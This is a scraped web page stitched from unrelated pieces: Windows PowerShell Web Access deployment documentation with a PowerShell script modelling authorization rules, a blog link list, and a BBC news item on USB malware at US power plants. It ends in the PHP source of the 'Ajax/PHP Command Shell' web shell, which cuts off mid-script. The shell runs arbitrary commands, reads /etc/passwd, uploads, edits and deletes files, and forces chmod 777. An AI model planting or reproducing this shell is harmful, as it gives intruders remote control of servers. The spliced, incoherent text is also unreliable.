2. Optional step for restricting user access by using session configurations: Verify that session configurations that you want to use in your rules already exist. If they have not yet been created, use instructions for creating session configurations in about_Session_Configuration_Files on MSDN.
3. Type the following, and then press Enter.

   Add-PswaAuthorizationRule -UserName <domain\user | computer\user> -ComputerName <computer_name> -ConfigurationName <session_configuration_name>

   This authorization rule allows a specific user access to one computer on the network to which they typically have access, with access to a specific session configuration that is scoped to the user’s typical scripting and cmdlet needs. In the following example, a user named JSmith in the Contoso domain is granted access to manage the computer Contoso_214, and use a session configuration named NewAdminsOnly.

   Add-PswaAuthorizationRule -UserName Contoso\JSmith -ComputerName Contoso_214 -ConfigurationName NewAdminsOnly

4. Verify that the rule has been created by running the Get-PswaAuthorizationRule cmdlet.

To remove an authorization rule

1.
If a Windows PowerShell session is not already open, see step 1 of To add a nonrestrictive authorization rule in this section.
2. Type the following, and then press Enter, where rule ID represents the unique ID number of the rule that you want to remove.

   Remove-PswaAuthorizationRule -ID <rule ID>

   Alternatively, if you do not know the ID number, but know the friendly name of the rule you want to remove, you can get the name of the rule, and pipe it to the Remove-PswaAuthorizationRule cmdlet to remove the rule, as shown in the following example:

   Get-PswaAuthorizationRule -RuleName <rule name> | Remove-PswaAuthorizationRule

Other authorization rule scenario examples

Every Windows PowerShell session uses a session configuration; if one is not specified for a session, Windows PowerShell uses the default, built-in Windows PowerShell session configuration, called Microsoft.PowerShell. The default session configuration includes all cmdlets that are available on a computer. Administrators can restrict access to all computers by defining a session configuration with a restricted runspace (a limited range of cmdlets and tasks that their end users could perform). A user who is granted access to one computer with either full language access or only the Windows PowerShell remote management cmdlets can connect to other computers that are connected to the first computer. Defining a restricted runspace can prevent users from accessing other computers from their allowed Windows PowerShell runspace, and improves the security of your Windows PowerShell Web Access environment. The session configuration can be distributed (by using Group Policy) to all computers that administrators want to make accessible through Windows PowerShell Web Access. For more information about session configurations, see about_Session_Configurations. The following are some examples of this scenario.

An administrator creates an endpoint, called PswaEndpoint, with a restricted runspace.
Then, the administrator creates a rule, *,*,PswaEndpoint, and distributes the endpoint to other computers. The rule allows all users to access all computers with the endpoint PswaEndpoint. If this is the only authorization rule defined in the rule set, computers without that endpoint would not be accessible.

The administrator created an endpoint with a restricted runspace called PswaEndpoint, and wants to restrict access to specific users. The administrator creates a group of users called Level1Support, and defines the following rule: Level1Support,*,PswaEndpoint. The rule grants any users in the group Level1Support access to all computers with the PswaEndpoint configuration. Similarly, access can be restricted to a specific set of computers.

Some administrators provide certain users more access than others. For example, an administrator creates two user groups, Admins and BasicSupport. The administrator also creates an endpoint with a restricted runspace called PswaEndpoint, and defines the following two rules: Admins,*,* and BasicSupport,*,PswaEndpoint. The first rule provides all users in the Admin group access to all computers, and the second rule provides all users in the BasicSupport group access only to those computers with PswaEndpoint.

An administrator has set up a private test environment, and wants to allow all authorized network users access to all computers on the network to which they typically have access, with access to all session configurations to which they typically have access. Because this is a private test environment, the administrator creates an authorization rule that is not secure. The administrator runs the cmdlet Add-PswaAuthorizationRule * * *, which uses the wildcard character * to represent all users, all computers, and all configurations. This rule is the equivalent of the following:

   Add-PswaAuthorizationRule -UserName * -ComputerName * -ConfigurationName *
An administrator must allow users to connect to target computers in an environment that includes both workgroups and domains, where workgroup computers are occasionally used to connect to target computers in domains, and computers in domains are occasionally used to connect to target computers in workgroups. The administrator has a gateway server, PswaServer, in a workgroup; and target computer srv1.contoso.com is in a domain. User Chris is an authorized local user on both the workgroup gateway server and the target computer. His user name on the workgroup server is chrisLocal; and his user name on the target computer is contoso\chris. To authorize access to srv1.contoso.com for Chris, the administrator adds the following rule.

   Add-PswaAuthorizationRule -userName PswaServer\chrisLocal -computerName srv1.contoso.com -configurationName Microsoft.PowerShell

The preceding rule example authenticates Chris on the gateway server, and then authorizes his access to srv1. On the sign-in page, Chris must provide a second set of credentials in the Optional connection settings area (contoso\chris). The gateway server uses the additional set of credentials to authenticate him on the target computer, srv1.contoso.com.

In the preceding scenario, Windows PowerShell Web Access establishes a successful connection to the target computer only after the following have been successful, and allowed by at least one authorization rule.

1. Authentication on the workgroup gateway server by adding a user name in the format server_name\user_name to the authorization rule
2. Authentication on the target computer by using alternate credentials provided on the sign-in page, in the Optional connection settings area

Using a single set of authorization rules for multiple sites

Authorization rules are stored in an XML file. By default, the path name of the XML file is %windir%\Web\PowershellWebAccess\data\AuthorizationRules.xml.
The path to the authorization rules XML file is stored in the powwa.config file, which is found in %windir%\Web\PowershellWebAccess\data. The administrator has the flexibility to change the reference to the default path in powwa.config to suit preferences or requirements. Allowing the administrator to change the location of the file lets multiple Windows PowerShell Web Access gateways use the same authorization rules, if such a configuration is desired.

Session management

By default, Windows PowerShell Web Access limits a user to three sessions at one time. You can edit the web application’s web.config file in IIS Manager to support a different number of sessions per user. The path to the web.config file is $Env:Windir\Web\PowerShellWebAccess\wwwroot\Web.config.

By default, Web Server (IIS) is configured to restart the application pool if any settings are edited. For example, the application pool is restarted if changes are made to the web.config file. Because Windows PowerShell Web Access uses in-memory session states, users signed in to Windows PowerShell Web Access sessions lose their sessions when the application pool is restarted.

Windows PowerShell Web Access sessions time out. A time-out message is displayed to signed-in users after 15 minutes of session inactivity. If the user does not respond within five minutes after the time-out message is displayed, the session is ended, and the user is signed out. You can change time-out periods for sessions in the website settings in IIS Manager.

Using the web-based Windows PowerShell console

After Windows PowerShell Web Access is installed and the gateway configuration is finished as described in this topic, the Windows PowerShell web-based console is ready to use. For more information about getting started in the web-based console, see Use the Web-based Windows PowerShell Console.
Troubleshooting access problems

[table=width: 700, class: grid, align: center]
[tr] [td]Problem[/td] [td]Possible cause and solution[/td] [/tr]
[tr] [td]Sign-in failure[/td] [td]Failure could occur because of any of the following. An authorization rule that allows the user access to the computer, or a specific session configuration on the remote computer, does not exist. Windows PowerShell Web Access security is restrictive; users must be granted explicit access to remote computers by using authorization rules. For more information about creating authorization rules, see Step 3: Configuring authorization rules and site security in this topic. The user does not have authorized access to the destination computer. This is determined by access control lists (ACLs). For more information, see “Signing in to Windows PowerShell Web Access” in Use the Web-based Windows PowerShell Console, or the Windows PowerShell Team Blog. Windows PowerShell remote management might not be enabled on the destination computer. Verify that it is enabled on the computer to which the user is trying to connect. For more information, see “How to Configure Your Computer for Remoting” in about_Remote_Requirements in the Windows PowerShell About Help Topics. [/td] [/tr]
[tr] [td]When users try to sign in to Windows PowerShell Web Access in an Internet Explorer window, they are shown an Internal Server Error page, or Internet Explorer stops responding. This issue is specific to Internet Explorer.[/td] [td]This can occur for users who have signed in with a domain name that contains Chinese characters, or if one or more Chinese characters are part of the gateway server name. To work around this issue, the user should install and run Internet Explorer 10, and then perform the following steps. 1. Change the Internet Explorer Document Mode setting to IE10 standards. Press F12 to open the Developer Tools console. In Internet Explorer 10, click Browser Mode, and then select Internet Explorer 10.
Click Document Mode, and then click IE10 standards. Press F12 again to close the Developer Tools console. 2. Disable automatic proxy configuration. In Internet Explorer 10, click Tools, and then click Internet Options. In the Internet Options dialog box, on the Connections tab, click LAN settings. Clear the Automatically detect settings check box. Click OK, and then click OK again to close the Internet Options dialog box. [/td] [/tr]
[tr] [td]Cannot connect to a remote workgroup computer[/td] [td]If the destination computer is a member of a workgroup, use the following syntax to provide your user name and sign in to the computer: <workgroup_name>\<user_name>[/td] [/tr]
[tr] [td]Cannot find Web Server (IIS) management tools, even though the role was installed[/td] [td]If you installed Windows PowerShell Web Access by using the Install-WindowsFeature cmdlet, management tools are not installed unless the IncludeManagementTools parameter is added to the cmdlet. For an example, see To install Windows PowerShell Web Access by using Windows PowerShell cmdlets in this topic. You can add the IIS Manager console and other IIS management tools that you need by selecting the tools in an Add Roles and Features Wizard session that is targeted at the gateway server. The Add Roles and Features Wizard is opened from within Server Manager.[/td] [/tr]
[tr] [td]The Windows PowerShell Web Access website is not accessible[/td] [td]If Enhanced Security Configuration is enabled in Internet Explorer (IE ESC), you can add the Windows PowerShell Web Access website to the list of trusted sites, or disable IE ESC. You can disable IE ESC on the local server properties page in Server Manager. The following error message is displayed while trying to connect when the gateway server is the destination computer, and is also in a workgroup: An authorization failure occurred. Verify that you are authorized to connect to the destination computer.
When the gateway server is also the destination server, and it is in a workgroup, specify the user name, computer name, and user group name as shown in the following table. Do not use a dot (.) by itself to represent the computer name.[/td] [/tr]
[tr] [td]The following error message is displayed while trying to connect when the gateway server is the destination computer, and is also in a workgroup: An authorization failure occurred. Verify that you are authorized to connect to the destination computer.[/td] [td][table=width: 500, align: center]
[tr] [td]Scenario[/td] [td]UserName Parameter[/td] [td]UserGroup Parameter[/td] [td]ComputerName Parameter[/td] [td]ComputerGroup Parameter[/td] [/tr]
[tr] [td]Gateway server is in a domain[/td] [td]Server_name\user_name, Localhost\user_name, or .\user_name[/td] [td]Server_name\user_group, Localhost\user_group, or .\user_group[/td] [td]Fully qualified name of gateway server, or Localhost[/td] [td]Server_name\computer_group, Localhost\computer_group, or .\computer_group[/td] [/tr]
[tr] [td]Gateway server is in a workgroup[/td] [td]Server_name\user_name, Localhost\user_name, or .\user_name[/td] [td]Server_name\user_group, Localhost\user_group or .\user_group[/td] [td]Server name[/td] [td]Server_name\computer_group, Localhost\computer_group or .\computer_group[/td] [/tr]
[tr] [td]Sign in to a gateway server as target computer by using credentials formatted as one of the following. Server_name\user_name Localhost\user_name .\user_name [/td] [/tr]
[/table] [/td] [/tr]
[tr] [td]A security identifier (SID) is displayed in an authorization rule instead of the syntax user_name/computer_name[/td] [td]Either the rule is no longer valid, or the Active Directory Domain Services query failed.
An authorization rule is usually not valid in scenarios where the gateway server was at one time in a workgroup, but was later joined to a domain.[/td] [/tr]
[tr] [td]Cannot sign in to a target computer that has been specified in authorization rules as an IPv6 address with a domain.[/td] [td]Authorization rules do not support an IPv6 address in form of a domain name. To specify a destination computer by using an IPv6 address, use the original IPv6 address (that contains colons) in the authorization rule. Both domain and numerical (with colons) IPv6 addresses are supported as the target computer name on the Windows PowerShell Web Access sign-in page, but not in authorization rules. For more information about IPv6 addresses, see How IPv6 Works.[/td] [/tr]
[/table]

To uninstall Windows PowerShell Web Access by using the Remove Roles and Features Wizard

1. If Server Manager is already open, go on to the next step. If Server Manager is not already open, open it by doing one of the following.
   - On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar.
   - On the Windows Start screen, click Server Manager.
2. On the Manage menu, click Remove Roles and Features.
3. On the Select destination server page, select the server or offline VHD from which you want to remove the feature. To select an offline VHD, first select the server on which to mount the VHD, and then select the VHD file. After you have selected the destination server, click Next.
4. Click Next again to skip to the Remove features page.
5. Clear the check box for Windows PowerShell Web Access, and then click Next.
6. On the Confirm removal selections page, click Remove.
7. After uninstallation is finished, go on to the procedure To delete the Windows PowerShell Web Access website and web applications by using IIS Manager.

To uninstall Windows PowerShell Web Access by using Windows PowerShell cmdlets

1.
Do one of the following to open a Windows PowerShell session with elevated user rights. If a session is already open, go on to the next step.
   - On the Windows desktop, right-click Windows PowerShell on the taskbar, and then click Run as Administrator.
   - On the Windows Start screen, right-click Windows PowerShell, and then click Run as Administrator.
2. Type the following, and then press Enter, where computer_name represents a remote server from which you want to remove Windows PowerShell Web Access. The -Restart parameter automatically restarts destination servers if required by the removal.

   Uninstall-WindowsFeature -Name WindowsPowerShellWebAccess -ComputerName <computer_name> -Restart

   To remove roles and features from an offline VHD, you must add both the -ComputerName parameter and the -VHD parameter. The -ComputerName parameter contains the name of the server on which to mount the VHD, and the -VHD parameter contains the path to the VHD file on the specified server.

   Uninstall-WindowsFeature -Name WindowsPowerShellWebAccess -VHD <path> -ComputerName <computer_name> -Restart

3. When removal is finished, verify that you removed Windows PowerShell Web Access by opening the All Servers page in Server Manager, selecting a server from which you removed the feature, and viewing the Roles and Features tile on the page for the selected server. You can also run the Get-WindowsFeature cmdlet targeted at the selected server (Get-WindowsFeature -ComputerName <computer_name>) to view a list of roles and features that are installed on the server.
4. After uninstallation is finished, go on to the procedure To delete the Windows PowerShell Web Access website and web applications by using IIS Manager.

To delete the Windows PowerShell Web Access website and web applications by using IIS Manager

1. Open the IIS Manager console by doing one of the following. If it is already open, go on to the next step.
   - On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Tools menu in Server Manager, click Internet Information Services (IIS) Manager.
   - On the Windows Start screen, type any part of the name Internet Information Services (IIS) Manager. Click the shortcut when it is displayed in the Apps results.
2. In the IIS Manager tree pane, select the website that is running the Windows PowerShell Web Access web application.
3. In the Actions pane, under Manage Website, click Stop.
4. In the tree pane, right-click the web application in the website that is running the Windows PowerShell Web Access web application, and then click Remove.
5. In the tree pane, select Application Pools, select the Windows PowerShell Web Access application pool folder, click Stop in the Actions pane, and then click Remove in the content pane.
6. Close IIS Manager.

Source: Deploy Windows PowerShell Web Access
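The authorization-rule semantics described in the post above (whitelist rules, default deny, one rule per user-or-group / computer / session-configuration triple, a lone asterisk as the only wildcard) can be modelled as follows. This is an added example, not part of the original post or of Windows PowerShell Web Access: it never calls the PSWA cmdlets, and the `*-Model*` function names, accounts and group membership are constructed for illustration.

```powershell
# Added example: a stand-alone model of the rule semantics described above.
# It does not call the PSWA cmdlets and does not read AuthorizationRules.xml.

# Constructed group membership; a real gateway resolves groups itself.
$GroupMembers = @{
    'Admins'       = @('contoso\carol')
    'BasicSupport' = @('contoso\bob')
}

function New-ModelRule {
    param([string]$Principal, [string]$Computer, [string]$Configuration)
    foreach ($value in $Principal, $Computer, $Configuration) {
        # A lone asterisk is the only wildcard form; 'srv*' is rejected.
        if ($value -ne '*' -and $value.Contains('*')) {
            throw "Wildcard inside a string is not supported: '$value'"
        }
    }
    [pscustomobject]@{
        Principal     = $Principal
        Computer      = $Computer
        Configuration = $Configuration
    }
}

function Test-ModelProperty {
    param([string]$RuleValue, [string]$Requested)
    # -eq compares literally (case-insensitive); -like would expand wildcards.
    ($RuleValue -eq '*') -or ($RuleValue -eq $Requested)
}

function Test-ModelPrincipal {
    param([string]$RulePrincipal, [string]$User)
    if (Test-ModelProperty -RuleValue $RulePrincipal -Requested $User) { return $true }
    # Otherwise treat the rule's principal as a group name.
    $GroupMembers.ContainsKey($RulePrincipal) -and
        ($GroupMembers[$RulePrincipal] -contains $User)
}

function Test-ModelAccess {
    param([object[]]$Rules, [string]$User, [string]$Computer, [string]$Configuration)
    foreach ($rule in $Rules) {
        $match = (Test-ModelPrincipal -RulePrincipal $rule.Principal -User $User) -and
                 (Test-ModelProperty -RuleValue $rule.Computer -Requested $Computer) -and
                 (Test-ModelProperty -RuleValue $rule.Configuration -Requested $Configuration)
        if ($match) { return $true }   # one matching rule is enough
    }
    return $false                      # default deny, including an empty rule set
}

function Get-ModelRuleFinding {
    # Flags rules an administrator should review before using them outside a test lab.
    param([object[]]$Rules)
    foreach ($rule in $Rules) {
        $text = '{0},{1},{2}' -f $rule.Principal, $rule.Computer, $rule.Configuration
        if ($rule.Principal -eq '*' -and $rule.Computer -eq '*' -and $rule.Configuration -eq '*') {
            [pscustomobject]@{ Rule = $text; Finding = 'open rule: every user, computer and configuration' }
        }
        elseif ($rule.Configuration -eq '*') {
            [pscustomobject]@{ Rule = $text; Finding = 'not limited to a restricted session configuration' }
        }
    }
}

# Rule set from the two-group scenario: Admins,*,* and BasicSupport,*,PswaEndpoint.
$rules = @(
    New-ModelRule -Principal 'Admins' -Computer '*' -Configuration '*'
    New-ModelRule -Principal 'BasicSupport' -Computer '*' -Configuration 'PswaEndpoint'
)

# Constructed access requests (contoso\dave belongs to no group).
$requests = @(
    @{ User = 'contoso\bob';   Computer = 'srv1.contoso.com'; Configuration = 'PswaEndpoint' }
    @{ User = 'contoso\bob';   Computer = 'srv1.contoso.com'; Configuration = 'Microsoft.PowerShell' }
    @{ User = 'contoso\carol'; Computer = 'srv1.contoso.com'; Configuration = 'Microsoft.PowerShell' }
    @{ User = 'contoso\dave';  Computer = 'srv1.contoso.com'; Configuration = 'PswaEndpoint' }
)
foreach ($r in $requests) {
    $allowed = Test-ModelAccess -Rules $rules @r
    '{0,-14} {1,-22} allowed={2}' -f $r.User, $r.Configuration, $allowed
}

# Zero rules means no access for anyone.
'empty rule set allowed={0}' -f (Test-ModelAccess -Rules @() -User 'contoso\carol' -Computer 'srv1.contoso.com' -Configuration 'PswaEndpoint')

# Review list for over-broad rules.
Get-ModelRuleFinding -Rules $rules | Format-Table -AutoSize

# A wildcard embedded in a string is refused when the rule is built.
try { New-ModelRule -Principal 'BasicSupport' -Computer 'srv*' -Configuration 'PswaEndpoint' }
catch { "rejected: $($_.Exception.Message)" }
```

On a real gateway the equivalent check of a specific user, computer and session configuration is made with Test-PswaAuthorizationRule, as listed in the cmdlet table in the post.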
-
nixCraft: Linux Tips, Hacks, Tutorials, And Ideas In Blog Format
All Things Distributed - All Things Distributed
High Scalability - High Scalability
MySQL Performance Optimization & Support, InnoDB, XtraDB and XtraBackup
Welcome to workaround.org | workaround.org
HowtoForge - Linux Howtos and Tutorials
Homepage
-
Two power plants in the US were affected by malware attacks in 2012, a security authority has said.

US authorities did not specify which plants had been hit - and to what extent

In its latest quarterly newsletter, the US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) said "common and sophisticated" attacks had taken place.

Malware had infected each plant's system after being inadvertently brought in on a USB stick, it said.

The ICS-CERT said it expected a rise in the number of similar attacks.

Malware can typically be used by cyber-attackers to gain remote access to systems, or to steal data.

In the newsletter, authorities said: "The malware was discovered when an employee asked company IT staff to inspect his USB drive after experiencing intermittent issues with the drive's operation.

"The employee routinely used this USB drive for backing up control systems configurations within the control environment."

And at a separate facility, more malware was found.

"A third-party technician used a USB-drive to upload software updates during a scheduled outage for equipment upgrades," the report said.

"Unknown to the technician, the USB-drive was infected with crimeware.

"The infection resulted in downtime for the impacted systems and delayed the plant restart by approximately three weeks."

Physical effects

The authority did not go into explicit details regarding the malware itself, but did stress that the use of removable media had to be reviewed and tightened.

"Such practices will mitigate many issues that could lead to extended system downtime," it said.

"Defence-in-depth strategies are also essential in planning control system networks and in providing protections to reduce the risk of impacts from cyber-events."

In recent years, power plants have been the target of increasingly destructive malware and viruses - a bridge between damage in a digital sense, such as data loss or theft, and actual physical infrastructure.

In 2010, the Stuxnet virus was said to have damaged critical parts of Iran's nuclear infrastructure.

Security firm Symantec research said it believed Stuxnet had been designed to hit motors controlling centrifuges and thus disrupt the creation of uranium fuel pellets.

A UN weapons inspector later said he believed the attack had set back Iran's nuclear programme.

No country has claimed responsibility for the attack, but a New York Times report last year, written by the author of a book on the attacks, pointed the finger at the US.

Journalist David E Sanger wrote that the US had acted with the co-operation of Israel.

Via BBC News - US plants hit by USB stick malware attack
-
~# shellhelp Ajax/PHP Command Shell © By Ironfist Version 0.7B The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you're not used to these commands, google a little. Custom Functions If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains 'func name' => 'javascript function'. Take a look at the built-in functions for examples. I know this readme isn't providing too much information, but hell, does this shell even require one - Iron <?php session_start(); error_reporting(0); $password = "password"; //Change this to your password $version = "0.7B"; $functions = array('Clear Screen' => 'ClearScreen()', 'Clear History' => 'ClearHistory()', 'Can I function?' 
=> "runcommand('canirun','GET')", 'Get server info' => "runcommand('showinfo','GET')", 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 'Running processes' => "runcommand('ps -aux','GET')", 'Readme' => "runcommand('shellhelp','GET')" ); $thisfile = basename(__FILE__); $style = '<style type="text/css"> .cmdthing { border-top-width: 0px; font-weight: bold; border-left-width: 0px; font-size: 10px; border-left-color: #000000; background: #000000; border-bottom-width: 0px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #008000; font-family: verdana; border-right-width: 0px; border-right-color: #000000; } input,textarea { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #FFFFFF; background: #000000; border-bottom-width: 1px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #FFFFFF; font-family: verdana; border-right-width: 1px; border-right-color: #FFFFFF; } A:hover { text-decoration: none; } table,td,div { border-collapse: collapse; border: 1px solid #FFFFFF; } body { color: #FFFFFF; font-family: verdana; } </style>'; $sess = __FILE__.$password; if(isset($_POST['p4ssw0rD'])) { if($_POST['p4ssw0rD'] == $password) { $_SESSION[$sess] = $_POST['p4ssw0rD']; } else { die("Wrong password"); } } if($_SESSION[$sess] == $password) { if(isset($_SESSION['workdir'])) { if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) { chdir($_SESSION['workdir']); } } if(isset($_FILES['uploadedfile']['name'])) { $target_path = "./"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { } } if(isset($_GET['runcmd'])) { $cmd = $_GET['runcmd']; print "<b>".get_current_user()."~# </b>". 
htmlspecialchars($cmd)."<br>"; if($cmd == "") { print "Empty Command..type \"shellhelp\" for some ehh...help"; } elseif($cmd == "upload") { print '<br>Uploading to: '.realpath("."); if(is_writable(realpath("."))) { print "<br><b>I can write to this directory</b>"; } else { print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>"; } } elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) { if(file_exists($file[1]) && is_dir($file[1])) { chdir($file[1]); $_SESSION['workdir'] = $file[1]; print "Current directory changed to ".$file[1]; } else { print "Directory not found"; } } elseif(strtolower($cmd) == "shellhelp") { print '<b><font size=7>Ajax/PHP Command Shell</b></font> © By Ironfist The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re not used to these commands, google a little. <b>Custom Functions</b> If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains \'func name\' => \'javascript function\'. Take a look at the built-in functions for examples. 
I know this readme isn\'t providing too much information, but hell, does this shell even require one - Iron '; } elseif(ereg("editfile (.*)",$cmd,$file)) { if(file_exists($file[1]) && !is_dir($file[1])) { print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">"; $contents = file($file[1]); foreach($contents as $line) { print htmlspecialchars($line); } print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } else { print "File not found."; } } elseif(ereg("deletefile (.*)",$cmd,$file)) { if(is_dir($file[1])) { if(rmdir($file[1])) { print "Directory succesfully deleted."; } else { print "Couldn't delete directory!"; } } else { if(unlink($file[1])) { print "File succesfully deleted."; } else { print "Couldn't delete file!"; } } } elseif(strtolower($cmd) == "canirun") { print "If any of these functions is Enabled, the shell will function like it should.<br>"; if(function_exists(passthru)) { print "Passthru: <b><font color=green>Enabled</b></font><br>"; } else { print "Passthru: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(exec)) { print "Exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Exec: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(system)) { print "System: <b><font color=green>Enabled</b></font><br>"; } else { print "System: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(shell_exec)) { print "Shell_exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Shell_exec: <b><font color=red>Disabled</b></font><br>"; } print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>"; if( ini_get('safe_mode') ){ print "Safe Mode: <b><font color=red>Enabled</b></font>"; } else { print "Safe Mode: <b><font color=green>Disabled</b></font>"; } print "<br><br>Open_basedir will 
block access to some files you <i>shouldn't</i> access.<br>"; if( ini_get('open_basedir') ){ print "Open_basedir: <b><font color=red>Enabled</b></font>"; } else { print "Open_basedir: <b><font color=green>Disabled</b></font>"; } } //About the shell elseif(ereg("listdir (.*)",$cmd,$directory)) { if(!file_exists($directory[1])) { die("Directory not found"); } //Some variables chdir($directory[1]); $i = 0; $f = 0; $dirs = ""; $filez = ""; if(!ereg("/$",$directory[1])) //Does it end with a slash? { $directory[1] .= "/"; //If not, add one } print "Listing directory: ".$directory[1]."<br>"; print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>"; if ($handle = opendir($directory[1])) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $dirs[$i] = $file; $i++; } else { $filez[$f] = $file; $f++; } } print "<td>"; foreach($dirs as $directory) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>"; } print "</td><td>"; foreach($filez as $file) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>"; } print "</td></table>"; } } elseif(strtolower($cmd) == "about") { print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version"; } //Show info elseif(strtolower($cmd) == "showinfo") { if(function_exists(disk_free_space)) { $free = disk_free_space("/") / 1000000; } else { $free = "N/A"; } if(function_exists(disk_total_space)) { $total = trim(disk_total_space("/") / 1000000); } else { $total = "N/A"; } $path = realpath ("."); print "<b>Free:</b> $free / $total 
MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>"; if(function_exists(passthru)) { passthru("uname -a"); } else { print "Passthru is disabled :("; } } //Read /etc/passwd elseif(strtolower($cmd) == "etcpasswdfile") { $pw = file('/etc/passwd/'); foreach($pw as $line) { print $line; } } //Execute any other command else { if(function_exists(passthru)) { passthru($cmd); } else { if(function_exists(exec)) { exec("ls -la",$result); foreach($result as $output) { print $output."<br>"; } } else { if(function_exists(system)) { system($cmd); } else { if(function_exists(shell_exec)) { print shell_exec($cmd); } else { print "Sorry, none of the command functions works."; } } } } } } elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) { $file = $_POST['filetosave']; if(!is_writable($file)) { if(!chmod($file, 0777)) { die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message } } $fh = fopen($file, 'w'); $dt = $_POST['filecontent']; fwrite($fh, $dt); fclose($fh); } else { ?> <html> <title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title> <head> <?php print $style; ?> <SCRIPT TYPE="text/javascript"> function sf(){document.cmdform.command.focus();} var outputcmd = ""; var cmdhistory = ""; function ClearScreen() { outputcmd = ""; document.getElementById('output').innerHTML = outputcmd; } function ClearHistory() { cmdhistory = ""; document.getElementById('history').innerHTML = cmdhistory; } function deletefile(file) { deleteit = window.confirm("Are you sure you want to delete\n"+file+"?"); if(deleteit) { runcommand('deletefile ' + file,'GET'); } } var http_request = false; function makePOSTRequest(url, parameters) { http_request = false; if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { 
http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function SaveFile() { var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) + "&filecontent=" + encodeURI( document.getElementById("area1").value ); makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr); document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly."; } function runcommand(urltoopen,action,contenttosend){ cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory; document.getElementById('history').innerHTML = cmdhistory; if(urltoopen == "clear") { ClearScreen(); } var ajaxRequest; try{ ajaxRequest = new XMLHttpRequest(); } catch (e){ try{ ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try{ ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ alert("Wicked error, nothing we can do about it..."); return false; } } } ajaxRequest.onreadystatechange = function(){ if(ajaxRequest.readyState == 4){ outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>"; document.getElementById('output').innerHTML = outputcmd; var objDiv = document.getElementById("output"); objDiv.scrollTop = objDiv.scrollHeight; } } ajaxRequest.open(action, "?runcmd="+urltoopen , true); if(action == "GET") { ajaxRequest.send(null); } document.cmdform.command.value=''; return false; } function set_tab_html(newhtml) { 
